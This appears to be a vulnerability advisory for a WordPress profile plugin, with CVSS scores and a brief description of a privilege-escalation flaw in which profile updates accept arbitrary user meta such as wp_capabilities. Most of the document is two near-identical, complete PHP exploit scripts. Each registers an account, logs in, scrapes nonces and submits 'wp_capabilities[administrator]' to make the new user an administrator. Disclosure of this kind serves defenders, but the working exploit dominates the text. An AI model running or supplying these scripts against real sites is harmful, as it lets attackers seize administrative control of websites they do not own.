8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The user profile update functionality of the plugin allowed arbitrary user meta to be supplied, including wp_capabilities, during a profile update which made it possible for users to escalate their privileges to that of an an administrator.
<?php
// Settings
$wp_url = $argv[1];
$proxy = '127.0.0.1:8081';
// Create User
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r3',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r3',
'reg_last_name' => 'hack',
'action' => 'pp_ajax_signup',
'melange_id' => '',
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
echo "Log in as newly created user";
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'pp_ajax_login',
'data' => 'login_username=hax0r3&login_password=password'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
//Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/account/edit-profile/');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
//Nonce
preg_match('/"nonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
preg_match('/value="Save Changes"><input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"/', $content, $matches);
$wpnonce = $matches[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r3',
'eup_email' => '[email protected]',
'eup_first_name' => 'Hax0r3',
'eup_nickname' => 'Hax0r',
'eup_display_name' => 'Hax0r',
'eup_last_name' => 'hack',
'_wpnonce' => $wpnonce,
'nonce' => $nonce,
'ppmyac_form_action' => 'updateProfile',
'action' => 'pp_ajax_editprofile',
'is_melange' => 'true',
'wp_capabilities[administrator]' => '1'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
or
<?php
// Settings
$wp_url = $argv[1];
$proxy = '127.0.0.1:8081';
// Create User
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r3',
'reg_email' => '[email protected]',
'reg_password' => 'password',
'reg_password_present' => 'true',
'reg_first_name' => 'Hax0r3',
'reg_last_name' => 'hack',
'action' => 'pp_ajax_signup',
'melange_id' => '',
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
echo "Log in as newly created user";
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'pp_ajax_login',
'data' => 'login_username=hax0r3&login_password=password'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
//Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/account/edit-profile/');
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
//Nonce
preg_match('/"nonce":"([^"]+)"/', $content, $matches);
$nonce = $matches[1];
preg_match('/value="Save Changes"><input type="hidden" id="_wpnonce" name="_wpnonce" value="([^"]+)"/', $content, $matches);
$wpnonce = $matches[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'reg_username' => 'Hax0r3',
'eup_email' => '[email protected]',
'eup_first_name' => 'Hax0r3',
'eup_nickname' => 'Hax0r',
'eup_display_name' => 'Hax0r',
'eup_last_name' => 'hack',
'_wpnonce' => $wpnonce,
'nonce' => $nonce,
'ppmyac_form_action' => 'updateProfile',
'eup_submit' => '1',
'is_melange' => 'true',
'wp_capabilities[administrator]' => '1'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P